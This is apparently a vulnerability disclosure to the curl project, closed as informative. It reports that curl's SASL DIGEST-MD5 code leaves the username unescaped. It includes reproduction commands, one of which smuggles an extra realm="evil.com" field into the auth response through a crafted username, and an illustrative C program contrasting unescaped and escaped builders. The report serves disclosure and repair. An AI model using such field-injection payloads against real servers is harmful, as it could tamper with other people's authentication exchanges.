Unescaped username in SASL DIGEST-MD5 response allows injection

Disclosed: 2026-03-17 14:48:47 By am-perip To curl
Low
Vulnerability Details
## Summary:

The username is inserted into the digest-md5 response without escaping the quotes or backslashes. The HTTP digest path on line 863 in lib/vauth/digest.c uses auth_digest_string_quoted(), but the SASL path does not (line 478). Commit ac419bf sorted the HTTP side in 2013. It looks like the SASL code was moved into the same file much later on, so it was potentially missed. There is a comment that says "escape the realm and nonce as necessary", but it doesn't mention the user.

## Affected version

8.19.1. Tested on my Mac, but I expect it to work on all platforms.

## Steps To Reproduce:

I created a dummy server (using Claude Code, full disclosure) to demo.

```
curl -s --max-time 2 --digest --user 'admin:pass' http://127.0.0.1:8888/
```

Produces:

```
Authorization: Digest username="admin", realm="test", nonce="abc123", uri="/", cnonce="OGE4MDE5ZDQ0NGUyMWQ4NTA3Y2JjNmViMTgzZDc4NWQ=", nc=00000001, qop=auth, response="741d2018ce65199de3d31d86c6b40a0e"
```

```
curl -s --max-time 2 --digest --user 'admin"test:pass' http://127.0.0.1:8888/
```

Produces:

```
Authorization: Digest username="admin\"test", realm="test", nonce="abc123", uri="/", cnonce="MmMwNGRmYzdkYjMxNDI0Mjg3NjUwODU3NWRjMTk4ZWU=", nc=00000001, qop=auth, response="cd9a77e93a813147fb6433d6adc94a10"
```

```
curl -s --max-time 2 imap://127.0.0.1:1143/ --user "admin\"test:pass" --login-options "AUTH=DIGEST-MD5"
```

Produces:

```
username="admin"test",realm="test",nonce="abc123",cnonce="731e487fc8b26e964f61a99afb4bc6dd",nc="00000001",digest-uri="imap/127.0.0.1",response=5833517c49eae3087bb93c977f4ddbea,qop=auth
```

And then using this exploit:

```
curl -s --max-time 2 imap://127.0.0.1:1143/ --user "admin\",realm=\"evil.com:pass" --login-options "AUTH=DIGEST-MD5"
```

Produces:

```
username="admin",realm="evil.com",realm="test",nonce="abc123",cnonce="94bd2728bd0e169a68954fecf1778a07",nc="00000001",digest-uri="imap/127.0.0.1",response=796d4900b43a41a294abe87a20a13da9,qop=auth
```

I've added in the evil realm by injecting a field into the request.

I've attached the full server script so you can see how I tested it.

## Impact

## Summary:

A username containing " or \ produces a malformed digest-md5 response. This could potentially enable injection of data into the smtp/imap/pop3/ldap auth.
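The escaping the report describes, as an added example that is not curl's code and not the reporter's: a hypothetical quote_value() that backslash-escapes `"` and `\` the way the report says auth_digest_string_quoted() does on the HTTP path, a response builder for the attacker-controlled fields in both the unescaped and the escaped form, and a minimal quoted-string-aware parser that counts how many times a field name appears. The field layout follows the report's sample output; the response hash, cnonce, nc and digest-uri are left out because they are not what the injection touches, and the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copy s into a new buffer; with escape != 0, prefix every '"' and '\\'
 * with a backslash so the result is safe inside a quoted-string value.
 * (Hypothetical stand-in for curl's auth_digest_string_quoted().) */
static char *quote_value(const char *s, int escape) {
    size_t n = strlen(s);
    char *out = malloc(2 * n + 1);   /* worst case: every byte escaped */
    if (!out)
        return NULL;
    char *p = out;
    for (; *s; s++) {
        if (escape && (*s == '"' || *s == '\\'))
            *p++ = '\\';
        *p++ = *s;
    }
    *p = '\0';
    return out;
}

/* Build the client's digest-md5 response for the quoted fields only.
 * escape == 0 mirrors the unescaped SASL path in the report,
 * escape == 1 the escaped HTTP path. Caller frees the result. */
static char *build_response(const char *user, const char *realm,
                            const char *nonce, int escape) {
    char *u = quote_value(user, escape);
    char *r = quote_value(realm, escape);
    char *n = quote_value(nonce, escape);
    char *out = NULL;
    if (u && r && n) {
        const char *fmt = "username=\"%s\",realm=\"%s\",nonce=\"%s\",qop=auth";
        int len = snprintf(NULL, 0, fmt, u, r, n);
        out = malloc((size_t)len + 1);
        if (out)
            snprintf(out, (size_t)len + 1, fmt, u, r, n);
    }
    free(u);
    free(r);
    free(n);
    return out;
}

/* Count how many times `name` appears as a key, parsing the way a
 * server would: a value starting with '"' runs to the next unescaped
 * '"', anything else runs to the next ','. */
static int count_field(const char *resp, const char *name) {
    int count = 0;
    size_t nlen = strlen(name);
    const char *p = resp;
    while (*p) {
        const char *eq = strchr(p, '=');
        if (!eq)
            break;
        if ((size_t)(eq - p) == nlen && strncmp(p, name, nlen) == 0)
            count++;
        p = eq + 1;
        if (*p == '"') {
            p++;
            while (*p && *p != '"') {
                if (*p == '\\' && p[1])
                    p++;             /* skip the escaped byte */
                p++;
            }
            if (*p == '"')
                p++;
        } else {
            while (*p && *p != ',')
                p++;
        }
        if (*p == ',')
            p++;
    }
    return count;
}

/* How many realm fields a server sees for a given username. */
static int realm_count(const char *user, int escape) {
    char *resp = build_response(user, "test", "abc123", escape);
    if (!resp)
        return -1;
    int n = count_field(resp, "realm");
    free(resp);
    return n;
}

int main(void) {
    const char *evil = "admin\",realm=\"evil.com";   /* the report's payload */
    char *bad = build_response(evil, "test", "abc123", 0);
    char *good = build_response(evil, "test", "abc123", 1);
    if (!bad || !good)
        return 1;
    printf("unescaped: %s\n  realm fields: %d\n", bad, count_field(bad, "realm"));
    printf("escaped:   %s\n  realm fields: %d\n", good, count_field(good, "realm"));
    free(bad);
    free(good);
    return 0;
}
```

With the report's payload the unescaped builder yields two realm fields, the first of them attacker-chosen; once the username is run through quote_value() the whole payload stays inside the username value and the server sees a single realm.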
Report Stats
  • Report ID: 3608522
  • State: Closed
  • Substate: informative
  • Upvotes: 1